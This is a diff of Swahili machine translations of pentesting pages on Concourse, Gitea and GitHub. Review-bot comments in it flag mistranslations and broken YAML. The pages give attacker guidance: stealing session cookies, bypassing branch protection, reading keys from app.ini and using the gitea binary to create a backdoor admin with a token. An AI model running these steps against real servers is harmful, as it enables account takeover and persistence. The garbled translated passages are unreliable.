+- hatua ya [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) inakamilisha [pipeline](https://concourse-ci.org/pipelines.html)
+- hatua ya [`load_var` step](https://concourse-ci.org/load-var-step.html) inachukua thamani katika [local var](https://concourse-ci.org/vars.html#local-vars)
+- hatua ya [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) inaendesha hatua kwa pamoja
+- hatua ya [`do` step](https://concourse-ci.org/do-step.html) inaendesha hatua kwa mpangilio
+- mrekebishaji wa hatua ya [`across` step](https://concourse-ci.org/across-step.html#schema.across) inaendesha hatua mara nyingi; mara moja kwa kila mchanganyiko wa thamani za mabadiliko
+- hatua ya [`try` step](https://concourse-ci.org/try-step.html) inajaribu kuendesha hatua na inafanikiwa hata kama hatua inashindwa
-Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step.
+Kila [step](https://concourse-ci.org/steps.html) katika [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) inaendesha katika **konteina yake mwenyewe**. Unaweza kuendesha chochote unachotaka ndani ya konteina _(yaani, endesha majaribio yangu, endesha hii bash script, jenga picha hii, nk.)_. Hivyo basi, ikiwa una kazi yenye hatua tano, Concourse itaunda konteina tano, moja kwa kila hatua.
-Therefore, it's possible to indicate the type of container each step needs to be run in.
+Kwa hiyo, inawezekana kuashiria aina ya konteina ambayo kila hatua inahitaji kuendesha ndani yake.
### Simple Pipeline Example
-
```yaml
jobs:
- - name: simple
- plan:
- - task: simple-task
- privileged: true
- config:
- # Tells Concourse which type of worker this task should run on
- platform: linux
- image_resource:
- type: registry-image
- source:
- repository: busybox # images are pulled from docker hub by default
- run:
- path: sh
- args:
- - -cx
- - |
- sleep 1000
- echo "$SUPER_SECRET"
- params:
- SUPER_SECRET: ((super.secret))
+- name: simple
+plan:
+- task: simple-task
+privileged: true
+config:
+# Tells Concourse which type of worker this task should run on
+platform: linux
+image_resource:
+type: registry-image
+source:
+repository: busybox # images are pulled from docker hub by default
+run:
+path: sh
+args:
+- -cx
+- |
+sleep 1000
+echo "$SUPER_SECRET"
+params:
+SUPER_SECRET: ((super.secret))
```
```bash
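Review bot: the RBAC manifest in the `echo '...' | kubectl apply -f -` block is no longer valid YAML after this change: `+resources: ["secrets"]` and `+verbs: ["get"]` are at column 0 while the preceding `- apiGroups: [""]` list item is still indented, and the same happens under `subjects:` (`+name: concourse-release-web`, `+namespace: default`) and under each `metadata:`; `kubectl apply` will reject the document. The `jobs:` pipeline below (`+- name: simple` through `+SUPER_SECRET: ((super.secret))`) is broken in the same way. Restore the original indentation of both blocks and exclude fenced code from the translation pass. In the steps list, `+... inakamilisha [pipeline](...)` says "completes" where the original says "configures" (`set_pipeline` configures a pipeline); "inasanidi" is closer. The headings `### Create Pipeline`, `### Steps` and `### Simple Pipeline Example` remain in English while their bodies are translated.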
@@ -130,26 +123,21 @@ fly -t tutorial trigger-job --job pipe-name/simple --watch
# From another console
fly -t tutorial intercept --job pipe-name/simple
```
-
Check **127.0.0.1:8080** to see the pipeline flow.
### Bash script with output/input pipeline
-It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**.
+Ni **uwezekano wa kuhifadhi matokeo ya kazi moja kwenye faili** na kuashiria kwamba ni pato na kisha kuashiria ingizo la kazi inayofuata kama pato la kazi ya awali. Kile ambacho concourse hufanya ni **kuweka saraka ya kazi ya awali katika kazi mpya ambapo unaweza kufikia faili zilizoundwa na kazi ya awali**.
### Triggers
-You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time:
+Huhitaji kuanzisha kazi kwa mikono kila wakati unapotaka kuzifanya, unaweza pia kuzipanga zifanyike kila wakati:
-- Some time passes: [Time resource](https://github.com/concourse/time-resource/)
-- On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource)
-- New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource)
-- Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/)
+- Wakati fulani unapita: [Time resource](https://github.com/concourse/time-resource/)
+- Kwa kujitolea mpya kwenye tawi kuu: [Git resource](https://github.com/concourse/git-resource)
+- PR mpya: [Github-PR resource](https://github.com/telia-oss/github-pr-resource)
+- Pakua au sukuma picha ya hivi karibuni ya programu yako: [Registry-image resource](https://github.com/concourse/registry-image-resource/)
-Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html)
+Angalia mfano wa YAML pipeline unaoanzisha kwenye kujitolea mpya kwa master katika [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
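Review bot: `+- Kwa kujitolea mpya kwenye tawi kuu` and `+... unaoanzisha kwenye kujitolea mpya kwa master` translate "commits" as "kujitolea" (to volunteer); "commit" is a technical term and should be kept as `commits` (e.g. "Kwa commits mpya kwenye tawi kuu"). `Check **127.0.0.1:8080** to see the pipeline flow.` and `### Triggers` remain untranslated in the same region, so the file now mixes languages sentence by sentence.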
diff --git a/src/pentesting-ci-cd/gitea-security/README.md b/src/pentesting-ci-cd/gitea-security/README.md
index bf4f6485a..b8f58c3dc 100644
--- a/src/pentesting-ci-cd/gitea-security/README.md
+++ b/src/pentesting-ci-cd/gitea-security/README.md
@@ -4,7 +4,7 @@
## What is Gitea
-**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go.
+**Gitea** ni **ufumbuzi wa mwenyeji wa jamii unaosimamiwa kwa urahisi wa kuhifadhi msimbo** ulioandikwa kwa Go.
.png>)
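Review bot: `+**Gitea** ni **ufumbuzi wa mwenyeji wa jamii unaosimamiwa kwa urahisi wa kuhifadhi msimbo** ...` garbles "self-hosted community managed lightweight code hosting": it reads as "a community-host solution managed easily" and loses both "self-hosted" and "lightweight". A rendering such as "suluhisho jepesi la kuhifadhi msimbo, linalojihifadhi (self-hosted) na kusimamiwa na jamii" keeps all three properties.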
@@ -16,127 +16,115 @@ basic-gitea-information.md
## Lab
-To run a Gitea instance locally you can just run a docker container:
-
+Ili kuendesha mfano wa Gitea kwa ndani unaweza tu kuendesha kontena la docker:
```bash
docker run -p 3000:3000 gitea/gitea
```
-
Connect to port 3000 to access the web page.
You could also run it with kubernetes:
-
```
helm repo add gitea-charts https://dl.gitea.io/charts/
helm install gitea gitea-charts/gitea
```
+## Uainishaji Usio na Uthibitisho
-## Unauthenticated Enumeration
+- Repos za umma: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos)
+- Watumiaji waliosajiliwa: [http://localhost:3000/explore/users](http://localhost:3000/explore/users)
+- Mashirika yaliyojregistered: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations)
-- Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos)
-- Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users)
-- Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations)
+Kumbuka kwamba kwa **kawaida Gitea inaruhusu watumiaji wapya kujiandikisha**. Hii haitatoa ufikiaji wa kuvutia kwa watumiaji wapya juu ya repos za mashirika/watumiaji wengine, lakini **mtumiaji aliyeingia** anaweza kuwa na uwezo wa **kuangalia repos au mashirika zaidi**.
-Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**.
+## Ukatili wa Ndani
-## Internal Exploitation
+Kwa hali hii tunaenda kudhani kwamba umepata ufikiaji wa akaunti ya github.
-For this scenario we are going to suppose that you have obtained some access to a github account.
+### Kwa Misingi ya Mtumiaji/Keki ya Mtandao
-### With User Credentials/Web Cookie
+Ikiwa kwa namna fulani tayari una misingi ya mtumiaji ndani ya shirika (au umepora keki ya kikao) unaweza **kuingia tu** na kuangalia ni **idhana gani una** juu ya **repos,** katika **timu zipi** ulizo, **orodhesha watumiaji wengine**, na **repos zimewezeshwaje.**
-If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how are the repos protected.**
-
-Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.
+Kumbuka kwamba **2FA inaweza kutumika** hivyo utaweza kufikia habari hii tu ikiwa unaweza pia **kupita ukaguzi huo**.
> [!NOTE]
-> Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
+> Kumbuka kwamba ikiwa **utafanikiwa kupora keki ya `i_like_gitea`** (sasa imewekwa na SameSite: Lax) unaweza **kujifanya kuwa mtumiaji** bila kuhitaji misingi au 2FA.
-### With User SSH Key
+### Kwa Funguo za SSH za Mtumiaji
-Gitea allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
-
-With this key you can perform **changes in repositories where the user has some privileges**, however you can not use it to access gitea api to enumerate the environment. However, you can **enumerate local settings** to get information about the repos and user you have access to:
+Gitea inaruhusu **watumiaji** kuweka **funguo za SSH** ambazo zitatumika kama **njia ya uthibitisho ya kupeleka msimbo** kwa niaba yao (hakuna 2FA inayotumika).
+Kwa funguo hii unaweza kufanya **mabadiliko katika repos ambapo mtumiaji ana baadhi ya mamlaka**, hata hivyo huwezi kuitumia kufikia api ya gitea ili kuainisha mazingira. Hata hivyo, unaweza **kuainisha mipangilio ya ndani** ili kupata habari kuhusu repos na mtumiaji ulionao ufikiaji:
```bash
# Go to the the repository folder
# Get repo config and current user name and email
git config --list
```
+Ikiwa mtumiaji ameweka jina lake la mtumiaji kama jina lake la gitea unaweza kufikia **funguo za umma alizoweka** katika akaunti yake kwenye _https://github.com/\.keys_, unaweza kuangalia hili kuthibitisha kuwa funguo binafsi ulizozipata zinaweza kutumika.
-If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used.
+**Funguo za SSH** pia zinaweza kuwekwa katika hifadhi kama **funguo za kutekeleza**. Mtu yeyote mwenye ufikiaji wa funguo hii ataweza **kuanzisha miradi kutoka kwenye hifadhi**. Kawaida katika seva yenye funguo tofauti za kutekeleza, faili ya ndani **`~/.ssh/config`** itakupa taarifa kuhusu funguo inayohusiana.
-**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
+#### Funguo za GPG
-#### GPG Keys
-
-As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.
-
-Check locally if the current user has any key with:
+Kama ilivyoelezwa [**hapa**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) wakati mwingine inahitajika kusaini ahadi au unaweza kugundulika.
+Angalia kwa ndani ikiwa mtumiaji wa sasa ana funguo yoyote kwa:
```shell
gpg --list-secret-keys --keyid-format=long
```
+### Kwa Token ya Mtumiaji
-### With User Token
+Kwa utangulizi kuhusu [**Token za Mtumiaji angalia taarifa za msingi**](basic-gitea-information.md#personal-access-tokens).
-For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens).
+Token ya mtumiaji inaweza kutumika **badala ya nenosiri** ili **kuhakiki** dhidi ya seva ya Gitea [**kupitia API**](https://try.gitea.io/api/swagger#/). itakuwa na **ufikiaji kamili** juu ya mtumiaji.
-A user token can be used **instead of a password** to **authenticate** against Gitea server [**via API**](https://try.gitea.io/api/swagger#/). it will has **complete access** over the user.
+### Kwa Programu ya Oauth
-### With Oauth Application
+Kwa utangulizi kuhusu [**Programu za Gitea Oauth angalia taarifa za msingi**](./#with-oauth-application).
-For an introduction about [**Gitea Oauth Applications check the basic information**](./#with-oauth-application).
+Mshambuliaji anaweza kuunda **Programu ya Oauth yenye uharibifu** ili kupata data/hatua za kibali za watumiaji wanaokubali labda kama sehemu ya kampeni ya uvuvi.
-An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
+Kama ilivyoelezwa katika taarifa za msingi, programu itakuwa na **ufikiaji kamili juu ya akaunti ya mtumiaji**.
-As explained in the basic information, the application will have **full access over the user account**.
+### Kupita Ulinzi wa Tawi
-### Branch Protection Bypass
+Katika Github tuna **github actions** ambazo kwa default hupata **token yenye ufikiaji wa kuandika** juu ya repo ambayo inaweza kutumika **kupita ulinzi wa tawi**. Katika kesi hii hiyo **haipo**, hivyo kupita ni mdogo zaidi. Lakini hebu tuangalie kile kinachoweza kufanywa:
-In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done:
+- **Washa Push**: Ikiwa mtu yeyote mwenye ufikiaji wa kuandika anaweza kusukuma kwenye tawi, sukuma tu.
+- **Orodha ya Push zilizozuiliwa**: Kwa njia ile ile, ikiwa wewe ni sehemu ya orodha hii sukuma kwenye tawi.
+- **Washa Orodha ya Merging**: Ikiwa kuna orodha ya merging, unahitaji kuwa ndani yake.
+- **Hitaji idhini ni kubwa kuliko 0**: Kisha... unahitaji kumaliza mtumiaji mwingine.
+- **Zuia idhini kwa watumiaji waliotajwa**: Ikiwa ni watumiaji waliotajwa pekee wanaweza kuidhinisha... unahitaji kumaliza mtumiaji mwingine aliye ndani ya orodha hiyo.
+- **Futa idhini za zamani**: Ikiwa idhini haziondolewa na commits mpya, unaweza kuingilia PR iliyothibitishwa tayari ili kuingiza msimbo wako na kuunganisha PR.
-- **Enable Push**: If anyone with write access can push to the branch, just push to it.
-- **Whitelist Restricted Pus**h: The same way, if you are part of this list push to the branch.
-- **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it
-- **Require approvals is bigger than 0**: Then... you need to compromise another user
-- **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list
-- **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR.
+Kumbuka kwamba **ikiwa wewe ni admin wa org/repo** unaweza kupita ulinzi.
-Note that **if you are an org/repo admin** you can bypass the protections.
+### Kuorodhesha Webhooks
-### Enumerate Webhooks
+**Webhooks** zinaweza **kutuma taarifa maalum za gitea mahali fulani**. Unaweza kuwa na uwezo wa **kuitumia mawasiliano hayo**.\
+Hata hivyo, kawaida **siri** ambayo huwezi **kuipata** imewekwa katika **webhook** ambayo itazuiya watumiaji wa nje wanaojua URL ya webhook lakini si siri kuweza **kuitumia webhook hiyo**.\
+Lakini katika matukio mengine, watu badala ya kuweka **siri** mahali pake, wana **iweka katika URL** kama parameter, hivyo **kuangalia URLs** kunaweza kukuruhusu **kupata siri** na maeneo mengine ambayo unaweza kuendeleza zaidi.
-**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\
-However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\
-But in some occasions, people instead of setting the **secret** in its place, they **set it in the URL** as a parameter, so **checking the URLs** could allow you to **find secrets** and other places you could exploit further.
+Webhooks zinaweza kuwekwa katika **repo na katika kiwango cha org**.
-Webhooks can be set at **repo and at org level**.
+## Baada ya Kutumia
-## Post Exploitation
+### Ndani ya seva
-### Inside the server
+Ikiwa kwa namna fulani umeweza kuingia ndani ya seva ambapo gitea inafanya kazi unapaswa kutafuta faili ya usanidi wa gitea. Kwa default iko katika `/data/gitea/conf/app.ini`
-If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini`
+Katika faili hii unaweza kupata **funguo** na **nenosiri**.
-In this file you can find **keys** and **passwords**.
+Katika njia ya gitea (kwa default: /data/gitea) unaweza pia kupata taarifa za kuvutia kama:
-In the gitea path (by default: /data/gitea) you can find also interesting information like:
+- DB ya **sqlite**: Ikiwa gitea haitumii db ya nje itatumia db ya sqlite.
+- **sessions** ndani ya folda za sessions: Ukikimbia `cat sessions/*/*/*` unaweza kuona majina ya watumiaji walioingia (gitea inaweza pia kuhifadhi sessions ndani ya DB).
+- **jwt private key** ndani ya folda ya jwt.
+- Taarifa zaidi **nyeti** zinaweza kupatikana katika folda hii.
-- The **sqlite** DB: If gitea is not using an external db it will use a sqlite db
-- The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea could also save the sessions inside the DB).
-- The **jwt private key** inside the jwt folder
-- More **sensitive information** could be found in this folder
+Ikiwa uko ndani ya seva unaweza pia **kutumia `gitea` binary** kupata/kubadilisha taarifa:
-If you are inside the server you can also **use the `gitea` binary** to access/modify information:
-
-- `gitea dump` will dump gitea and generate a .zip file
-- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence)
-- `gitea admin user change-password --username admin --password newpassword` Change the password
-- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token
+- `gitea dump` itatoa gitea na kuunda faili .zip.
+- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` itaunda token ya aina iliyoonyeshwa (kuhifadhi).
+- `gitea admin user change-password --username admin --password newpassword` Badilisha nenosiri.
+- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Unda mtumiaji mpya wa admin na pata token ya ufikiaji.
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
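Review bot: The branch-protection option names in the `+` list (`**Washa Push**`, `**Orodha ya Push zilizozuiliwa**`, `**Washa Orodha ya Merging**`, `**Zuia idhini kwa watumiaji waliotajwa**`) are Gitea UI labels, and they are translated differently from the same options in `basic-gitea-information.md` within this same change (`**Ruhusu Push**`, `**Whitelist Restricted Push**`, `**Ruhusu Merge Whitelist**`, `**Zuia idhini kwa walio kwenye orodha ya kibali**`), so a reader cannot match the bypass list against the settings list. Keep the English option label in bold and translate only the explanation, as the page already does for `gitea dump`, `INTERNAL_TOKEN` and the other CLI strings. Also, the blank line removed just before the `gitea dump` list is not restored on the `+` side, so the list now butts directly against `Ikiwa uko ndani ya seva ...`; keep the blank line for consistency with the rest of the file.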
diff --git a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md
index e6e4d9ba3..f61b898c3 100644
--- a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md
+++ b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md
@@ -4,104 +4,100 @@
## Basic Structure
-The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization.
+Muundo wa msingi wa mazingira ya Gitea ni kuunganisha repos kwa **organization(s),** kila moja inaweza kuwa na **repositories kadhaa** na **teams kadhaa.** Hata hivyo, kumbuka kwamba kama ilivyo katika github, watumiaji wanaweza kuwa na repos nje ya shirika.
-Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**.
+Zaidi ya hayo, **mtumiaji** anaweza kuwa **mwanachama** wa **mashirika tofauti.** Ndani ya shirika, mtumiaji anaweza kuwa na **idhini tofauti juu ya kila repository.**
-A user may also be **part of different teams** with different permissions over different repos.
+Mtumiaji pia anaweza kuwa **sehemu ya teams tofauti** zikiwa na idhini tofauti juu ya repos tofauti.
-And finally **repositories may have special protection mechanisms**.
+Na hatimaye, **repositories zinaweza kuwa na mifumo maalum ya ulinzi.**
## Permissions
### Organizations
-When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**.
+Wakati **shirika linaundwa,** timu inayoitwa **Owners** inaundwa na mtumiaji anawekwa ndani yake. Timu hii itatoa **ufikiaji wa admin** juu ya **shirika,** hizo **idhini** na **jina** la timu **haziwezi kubadilishwa.**
-**Org admins** (owners) can select the **visibility** of the organization:
+**Org admins** (wamiliki) wanaweza kuchagua **mwonekano** wa shirika:
-- Public
-- Limited (logged in users only)
-- Private (members only)
+- Umma
+- Kizuiwaji (watumiaji walioingia tu)
+- Binafsi (wanachama tu)
-**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos.
+**Org admins** wanaweza pia kuonyesha ikiwa **repo admins** wanaweza **kuongeza au kuondoa ufikiaji** kwa teams. Wanaweza pia kuonyesha idadi ya juu ya repos.
-When creating a new team, several important settings are selected:
+Wakati wa kuunda timu mpya, mipangilio kadhaa muhimu inachaguliwa:
-- It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all.
-- It's also indicated **if members can create new repos** (creator will get admin access to it)
-- The **permissions** the **members** of the repo will **have**:
- - **Administrator** access
- - **Specific** access:
+- Inabainishwa **repos za shirika ambazo wanachama wa timu wataweza kufikia**: repos maalum (repos ambapo timu imeongezwa) au zote.
+- Pia inabainishwa **ikiwa wanachama wanaweza kuunda repos mpya** (mwandikaji atapata ufikiaji wa admin kwa hiyo)
+- **Idhini** ambazo **wanachama** wa repo wata **kuwa nazo**:
+- **Ukurugenzi** wa ufikiaji
+- **Ukurugenzi** maalum:
.png>)
### Teams & Users
-In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**:
+Katika repo, **org admin** na **repo admins** (ikiwa inaruhusiwa na shirika) wanaweza **kusimamia majukumu** yanayotolewa kwa washirikiano (watumiaji wengine) na teams. Kuna **3** majukumu yanayowezekana:
-- Administrator
-- Write
-- Read
+- Mkurugenzi
+- Andika
+- Soma
## Gitea Authentication
### Web Access
-Using **username + password** and potentially (and recommended) a 2FA.
+Kutumia **jina la mtumiaji + nenosiri** na labda (na inapendekezwa) 2FA.
### **SSH Keys**
-You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
+Unaweza kuunda akaunti yako na funguo moja au kadhaa za umma zinazoruhusu funguo husika za **binafsi kufanya vitendo kwa niaba yako.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
#### **GPG Keys**
-You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**.
+Huwezi kujifanya kuwa mtumiaji kwa funguo hizi lakini ikiwa huzitumii inaweza kuwa inawezekana kwamba **unagundulika kwa kutuma commits bila saini.**
### **Personal Access Tokens**
-You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
+Unaweza kuunda token za ufikiaji wa kibinafsi ili **kutoa programu ufikiaji wa akaunti yako.** Token ya ufikiaji wa kibinafsi inatoa ufikiaji kamili juu ya akaunti yako: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
### Oauth Applications
-Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet:
+Kama token za ufikiaji wa kibinafsi, **Oauth applications** zitakuwa na **ufikiaji kamili** juu ya akaunti yako na maeneo ambayo akaunti yako ina ufikiaji kwa sababu, kama ilivyoonyeshwa katika [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes hazijasaidiwa bado:
.png>)
### Deploy keys
-Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos.
+Funguo za kupeleka zinaweza kuwa na ufikiaji wa kusoma tu au kuandika kwa repo, hivyo zinaweza kuwa za kuvutia kuathiri repos maalum.
## Branch Protections
-Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
+Ulinzi wa branch umeundwa ili **kutopeana udhibiti kamili wa repository** kwa watumiaji. Lengo ni **kueka mbinu kadhaa za ulinzi kabla ya kuwa na uwezo wa kuandika msimbo ndani ya branch fulani.**
-The **branch protections of a repository** can be found in _https://localhost:3000/\/\/settings/branches_
+**Ulinzi wa branch wa repository** unaweza kupatikana katika _https://localhost:3000/\/\/settings/branches_
> [!NOTE]
-> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo.
+> Haiwezekani kuweka ulinzi wa branch katika kiwango cha shirika. Hivyo zote lazima zitangazwe kwenye kila repo.
-Different protections can be applied to a branch (like to master):
+Ulinzi tofauti unaweza kutumika kwa branch (kama kwa master):
-- **Disable Push**: No-one can push to this branch
-- **Enable Push**: Anyone with access can push, but not force push.
-- **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push)
-- **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs.
-- **Enable Status checks:** Require status checks to pass before merging.
-- **Require approvals**: Indicate the number of approvals required before a PR can be merged.
-- **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs.
-- **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass)
-- **Block merge on official review requests**: If there official review requests it cannot be merged
-- **Dismiss stale approvals**: When new commits, old approvals will be dismissed.
-- **Require Signed Commits**: Commits must be signed.
-- **Block merge if pull request is outdated**
-- **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes
+- **Zuia Push**: Hakuna mtu anaweza kusukuma kwenye branch hii
+- **Ruhusu Push**: Mtu yeyote mwenye ufikiaji anaweza kusukuma, lakini si kusukuma kwa nguvu.
+- **Whitelist Restricted Push**: Ni watumiaji/teams waliochaguliwa pekee wanaweza kusukuma kwenye branch hii (lakini hakuna kusukuma kwa nguvu)
+- **Ruhusu Merge Whitelist**: Ni watumiaji/teams walio kwenye orodha ya kibali pekee wanaweza kuunganishwa PRs.
+- **Ruhusu Status checks:** Hitaji ukaguzi wa hali kupita kabla ya kuunganishwa.
+- **Hitaji idhini**: Onyesha idadi ya idhini zinazohitajika kabla ya PR kuunganishwa.
+- **Zuia idhini kwa walio kwenye orodha ya kibali**: Onyesha watumiaji/teams wanaoweza kuidhinisha PRs.
+- **Zuia kuunganishwa kwenye mapitio yaliyokataliwa**: Ikiwa mabadiliko yanahitajika, haiwezi kuunganishwa (hata kama ukaguzi mwingine unapita)
+- **Zuia kuunganishwa kwenye maombi rasmi ya ukaguzi**: Ikiwa kuna maombi rasmi ya ukaguzi haiwezi kuunganishwa
+- **Futa idhini za zamani**: Wakati commits mpya, idhini za zamani zitafutwa.
+- **Hitaji Commits Zilizotiwa Saini**: Commits lazima ziwe na saini.
+- **Zuia kuunganishwa ikiwa ombi la kuvuta limepitwa na wakati**
+- **Mifumo ya faili zilizolindwa/zisizolindwa**: Onyesha mifumo ya faili za kulinda/kutozingatia dhidi ya mabadiliko
> [!NOTE]
-> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline.
+> Kama unavyoona, hata kama umeweza kupata baadhi ya akidi za mtumiaji, **repos zinaweza kulindwa zikizuia wewe kusukuma msimbo kwa master** kwa mfano kuathiri pipeline ya CI/CD.
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
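Review bot: The nested team-permission sub-items lose both their indentation and their meaning in the `+` block: `- - **Administrator** access` and `- - **Specific** access:` become top-level `+- **Ukurugenzi** wa ufikiaji` and `+- **Ukurugenzi** maalum:`, so they no longer render under `**Idhini** ambazo **wanachama** wa repo wata **kuwa nazo**:`, and both now read as administrator access, dropping the Administrator-versus-Specific distinction the original makes. Indent them as in the `-` lines and translate the second item as a specific (non-admin) permission set; while there, the bold split inside `wata **kuwa nazo**` should cover the whole verb.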
diff --git a/src/pentesting-ci-cd/github-security/README.md b/src/pentesting-ci-cd/github-security/README.md
index cdad12b57..eb61aa4cb 100644
--- a/src/pentesting-ci-cd/github-security/README.md
+++ b/src/pentesting-ci-cd/github-security/README.md
@@ -4,7 +4,7 @@
## What is Github
-(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**.
+(From [here](https://kinsta.com/knowledgebase/what-is-github/)) Kwa kiwango cha juu, **GitHub ni tovuti na huduma ya msingi wa wingu inayosaidia waendelezaji kuhifadhi na kusimamia msimbo wao, pamoja na kufuatilia na kudhibiti mabadiliko kwenye msimbo wao**.
### Basic Information
@@ -14,29 +14,29 @@ basic-github-information.md
## External Recon
-Github repositories can be configured as public, private and internal.
+Github repositories zinaweza kuwekwa kama za umma, binafsi na za ndani.
-- **Private** means that **only** people of the **organisation** will be able to access them
-- **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it
-- **Public** means that **all internet** is going to be able to access it.
+- **Binafsi** inamaanisha kwamba **tu** watu wa **shirika** wataweza kuzifikia
+- **Za ndani** inamaanisha kwamba **tu** watu wa **biashara** (biashara inaweza kuwa na mashirika kadhaa) wataweza kuzifikia
+- **Umma** inamaanisha kwamba **mtandao wote** utaweza kuzifikia.
-In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**.
+Ikiwa unajua **mtumiaji, repo au shirika unalotaka kulenga** unaweza kutumia **github dorks** kupata taarifa nyeti au kutafuta **mvuja taarifa nyeti** **katika kila repo**.
### Github Dorks
-Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**.
